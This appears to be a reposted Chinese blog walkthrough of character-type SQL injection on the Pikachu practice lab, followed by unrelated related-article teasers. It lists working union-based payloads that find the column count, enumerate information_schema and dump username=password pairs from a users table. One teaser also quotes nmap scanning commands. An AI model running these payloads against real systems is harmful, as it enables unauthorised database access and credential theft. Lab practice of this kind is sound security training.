pikachu之sql lnjet 字符型注入

pikachu之sql lnjet 字符型注入

news/2024/9/23 5:20:22/文章来源:https://blog.csdn.net/LIU6636LIU/article/details/140636828

先测试一下闭合

注释符号：--+ 注释符号可以忽略其后的内容，使得后续的原始查询内容不会影响我们注入的SQL代码。
条件测试：通过and 1=1和and 1=2分别测试真假条件，可以判断输入是否成功闭合，并且可以检测注入是否成功。

kobe' and 1=1 --+和kobe' and 1=2 --+可以通过条件测试和注释符号，帮助我们确认输入是否能成功闭合，从而测试SQL注入漏洞的存在。

判断一下字段数

kobe' order by 1--+正常显示

kobe' order by 2--+正常显示

kobe' order by 3--+显示unknown

kobe' union select 1,2 --+

下一步查数据库

查到了数据库进一步查表

查字段kobe' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

查username password

kobe' union select 1,(select group_concat(username,'=',password) from users) --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.xdnf.cn/news/1486733.html

如若内容造成侵权/违法违规/事实不符，请联系一条长河网进行投诉反馈，一经查实，立即删除！

相关文章

Kotlin 协程 — 基础

Kotlin 协程 — 基础

Kotlin 协程 — 基础协程已经存在一段时间了，关于它的各种文章也很多。但我发现想要了解它还比较费时，所以我花了一段时间才真正理解了协程的基础知识以及它的工作原理。因此，我想分享一些我理解到的内容。什么是协程？ 协程代表…

阅读更多...

关于OLED的I2C手册记录

关于OLED的I2C手册记录

首先我们从淘宝上面找到对应OLED 4pin iic驱动的ssd1306手册，它有多种的驱动方式，我们只需要看看他这个i2c模式。我们可以从中看到 Slave address R/W后面的#代表低电平是W。 SA0是它的一个 slave address bit 可以使用这两个都可以作为OLED的设备…

阅读更多...

分布式事务与Seata落地

分布式事务与Seata落地

分布式事务与Seata落地一、事务基础 1.1 本地事务事务指的就是一个操作单元, 在这个操作单元中的所有操作最终要保持一致的行为, 要么所有操作都成功, 要么所有的操作都被撤销。 1.2 本地事务特性本地事务四大特性: ACID A: 原子性(Atomicity), 一个事务中的所有操作, …

阅读更多...

如何通过一条SQL变更多个分库分表？

如何通过一条SQL变更多个分库分表？

数据库发展到今天，分库分表已经不是什么新鲜话题了，传统的单节点数据库架构在数据量和访问频次达到一定规模时，会出现性能瓶颈和扩展性问题，而分库分表技术通过将数据分散到多个数据库实例中来分担负载，从而提升系统的…

阅读更多...

数字信号||离散序列的基本运算（2）

数字信号||离散序列的基本运算（2）

实验二离散序列的基本运算一、实验目的 (1)进一步了解离散时间序列时域的基本运算。 (2)了解MATLAB语言进行离散序列运算的常用函数，掌握离散序列运算程序的编写方法。二、实验涉及的MATLAB子函数 1.find 功能：寻找非零元素的索引号。调用格…

阅读更多...

BGP选路之Local Preference

BGP选路之Local Preference

原理概述当一台BGP路由器中存在多条去往同一目标网络的BGP路由时，BGP协议会对这些BGP路由的属性进行比较，以确定去往该目标网络的最优BGP路由。BGP首先比较的是路由信息的首选值（PrefVal)，如果 PrefVal相同，就会比较本…

阅读更多...

Linux_权限3

Linux_权限3

Linux所对应的文件类型 1.在Win下，有文件类型，通常通过后缀标识日常用的就是windows系统这里不做举例. 2.Linux的文件类型不通过后缀区分（不代表Linux不用后缀) 其中需要注意的是第一个字符表示文件类型的含义 - :普通文件, 文本, 源代码…

阅读更多...

解决：uniapp 小程序使用swiper 内部嵌套另外一个拥有左右滑动组件导致滑动冲突

解决：uniapp 小程序使用swiper 内部嵌套另外一个拥有左右滑动组件导致滑动冲突

解决办法在swiper-item 内增加这个属性进行包裹 touchmove.stop <div touchmove.stop><qiun-data-charts type"area" :opts"optsStg" :chartData"dateDataStg" /> </div>

阅读更多...

嘉立创|如何在原理图中框选任意元件

嘉立创|如何在原理图中框选任意元件

点击编辑—选择对象—对边形内部便可以任意框选选中之后，进入pcb板界面也选中了相同器件

阅读更多...

使用kali对操作系统和网络服务类型进行探测

使用kali对操作系统和网络服务类型进行探测

1．在Kali终端中输入命令“nmap –sS –n -O 192.168.2.2”，探测目标主机的操作系统类型 2． 在Kali终端中输入命令“nmap –sV -n 192.168.2.2”，探测目标主机开启的网络服务类型 3.在Kali终端中输入命令“nmap –A -n 192.168.2.2…

阅读更多...

Linux中的System V通信标准--共享内存、消息队列以及信号量

Linux中的System V通信标准--共享内存、消息队列以及信号量

关于 System V 标准，一共有三种通信方式，分别为：共享内存、信号量和消息队列三种通信方式。本篇将较为详细的讲解三种通信方式的实现原理，以及介绍在 Linux 系统下调用这三种的通信方式的接口，其中以共享内存为例&…

阅读更多...

.netcore TSC打印机打印

.netcore TSC打印机打印

此文章给出两种打印案例， 第一种是单列打印，第二种是双列打印需要注意打印机名称的设置，程序中使用的打印机名称为999，电脑中安装打印机时名称也要为999。以下是我在使用过程中总结的一些问题： 一 TSC打印机使用使…

阅读更多...

【区块链+绿色低碳】巴中市生态价值核算创新应用 | FISCO BCOS应用案例

【区块链+绿色低碳】巴中市生态价值核算创新应用 | FISCO BCOS应用案例

生态产品总值（GEP），指一定区域生态系统为人类福祉和经济社会可持续发展提供的产品与服务价值总和，包括供给产品价值、调节服务价值和文化服务价值。当前，推动生态产品价值有效转化存在“难度量、难抵押、难交易、难变…

阅读更多...

【机器学习算法基础】（基础机器学习课程）-08-决策树和随机森林-笔记

【机器学习算法基础】（基础机器学习课程）-08-决策树和随机森林-笔记

一、决策树之信息论基础决策树是一种用来做决策的工具，就像我们生活中的选择树。例如，你在选择今天穿什么衣服时，会根据天气情况、出行活动等进行判断。决策树的构建过程涉及一些信息论的概念，用来衡量和选择最好的“分叉点”来进…

阅读更多...

Adobe Dimension（DN）安装包软件下载

Adobe Dimension（DN）安装包软件下载

目录一、软件简介二、软件下载三、注意事项四、软件功能五、常用快捷键快捷键： 一、软件简介 Adobe Dimension（简称DN）是Adobe公司推出的一款三维设计和渲染软件。与一般的3D绘图软件相比，DN在操作界面和功能上有所不…

阅读更多...

Spark实时（一）：StructuredStreaming 介绍

Spark实时（一）：StructuredStreaming 介绍

文章目录 StructuredStreaming 介绍一、SparkStreaming实时数据处理痛点 1、复杂的编程模式 2、SparkStreaming处理实时数据只支持Processing Time 3、微批处理，延迟高 4、精准消费一次问题二、StructuredStreaming概述三、…

阅读更多...

python使用 tkinter 生成随机颜色

python使用 tkinter 生成随机颜色

先看效果: 只要不停点击底部的按钮，每次都会生成新的颜色。炫酷啊。 import random import tkinter import tkinter.messagebox from tkinter import Button# todo """ 1. 设置一个按钮，来让用户选择是否显示颜色值 2. 把按钮换成 Label…

阅读更多...

《白话机器学习的数学》第2章——学习回归

《白话机器学习的数学》第2章——学习回归

2.1设置问题 1.机器学习所做的事情正是从数据中进行学习，然后给出预测值。 2.2定义模型 1.一次函数的表达式： 其中θ叫做参数。在统计学领域，人们常常使用 θ 来表示未知数和推测值。采用 θ加数字下标的形式，是为了防止当未知数…

阅读更多...

网络访问(Socket/WebSocket/HTTP)

网络访问(Socket/WebSocket/HTTP)

概述 HarmonyOS为用户提供了网络连接功能，具体由网络管理模块负责。通过该模块，用户可以进行Socket网络通滚、WebSocket连接、HTTP数据请求等网络通信服务。 Socket网络通信：通过Socket(嵌套字)进行数据通信，支持的协议包括UDP核…

阅读更多...

【教程】vscode添加powershell7终端

【教程】vscode添加powershell7终端

win10自带的 powershell 是1.0版本的，太老了，更换为powershell7后，在 vscode 的集成终端中没有显示本篇教程记录在vscode添加powershell7终端的过程打开vscode终端配置然后来到这个页面进行设置查看 powershell7 的安装位置&#xff…

阅读更多...

最新文章